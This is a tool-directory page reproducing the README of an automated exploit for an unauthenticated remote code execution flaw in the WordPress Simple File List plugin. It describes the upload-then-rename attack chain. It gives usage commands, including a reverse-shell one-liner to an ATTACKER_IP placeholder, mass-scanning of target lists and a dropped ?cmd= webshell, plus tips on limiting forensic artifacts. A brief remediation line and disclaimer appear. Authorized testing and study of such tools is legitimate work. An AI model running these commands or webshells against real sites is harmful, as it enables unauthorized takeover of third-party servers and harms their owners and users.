Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-34085 — Exploit for CVE-2025-34085 | Kitploit
Tools/GitHubGitHub/0xgunrunner/cve-2025-34085
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHub0xgunrunner/cve-2025-34085

CVE-2025-34085

Exploit for CVE-2025-34085

View Repository
147 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-34085 — WordPress Simple File List Unauthenticated RCE

An automated exploit for CVE-2025-34085 (duplicate of CVE-2020-36847), a critical unauthenticated remote code execution vulnerability in the WordPress Simple File List plugin versions ≤ 4.2.2.

Note: CVE-2025-34085 was rejected by MITRE as a duplicate of CVE-2020-36847. The vulnerability is real and patched in version 4.2.3. Both CVE IDs refer to the same underlying issue.

Vulnerability Summary

FieldDetail
CVECVE-2025-34085 / CVE-2020-36847
PluginSimple File List
Affected Versions≤ 4.2.2
Fixed Version4.2.3
TypeUnrestricted File Upload → Rename Bypass → RCE
CVSS9.8 (Critical)
AuthenticationNone required
Original Discoverycoiffeur
Metasploit Moduleexploit/multi/http/wp_simple_file_list_rce

How It Works

  1. Upload — A PHP payload is uploaded disguised as a .png file via the plugin's upload endpoint (ee-upload-engine.php). The upload engine validates extensions but accepts image files.

  2. Rename — The plugin's rename functionality (ee-file-engine.php) does not enforce extension restrictions. The attacker renames the .png to .php (or .phtml, .php5, .php3).

  3. Execute — The renamed PHP file is now accessible and executable in the uploads directory at /wp-content/uploads/simple-file-list/, giving the attacker arbitrary command execution.

Requirements

pip install requests colorama

Python 3.6+

Usage

Single Target

python3 CVE-2025-34085.py -u http://target.com --cmd "id"

Single Target with Inline Command (no ?cmd= parameter)

python3 CVE-2025-34085.py -u http://target.com --cmd "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'" --inline

Mass Scanning

Create a targets.txt file with one URL per line:

http://target1.com
http://target2.com
https://target3.com
python3 CVE-2025-34085.py --cmd "id"

Arguments

ArgumentDescriptionDefault
-u, --urlSingle target URL—
--cmdCommand to execute on the targetid
--inlineInject command directly into the PHP shell (hardcoded, no ?cmd= webshell)False

Tip: Use --inline when you need a reverse shell or when the target has query string filtering. Without --inline, the exploit drops a webshell that accepts commands via ?cmd=.

Output

Successful exploits are logged to vuln.txt:

http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php | uid=33(www-data) gid=33(www-data)

OPSEC Notes for OSCP

  • The exploit uploads a PHP file to disk — this will leave artifacts
  • The webshell persists at /wp-content/uploads/simple-file-list/<random>.php
  • Successful uploads are logged to vuln.txt locally — useful for your report
  • For the exam, use --inline with a reverse shell to avoid leaving a persistent webshell with ?cmd=
  • If the target blocks outbound ports, try common allowed ports (80, 443, 53)

References

  • NVD — CVE-2025-34085
  • NVD — CVE-2020-36847
  • Wordfence Advisory
  • Metasploit Module
  • Plugin Changelog (Patch)
  • Exploit-DB #48979
  • Original PoC by coiffeur — Exploit-DB #48349

Remediation

Upgrade the Simple File List plugin to version 4.2.3 or later.

Disclaimer

This tool is intended for authorized penetration testing and educational purposes only. Unauthorized access to computer systems is illegal. Always obtain proper authorization before testing.

Credits

  • Original vulnerability discovery: coiffeur
  • Original exploit script: 0xgh057r3c0n, B1ack4sh (Ashwesker)
  • Maintained by: 0xgunrunner
Download Tool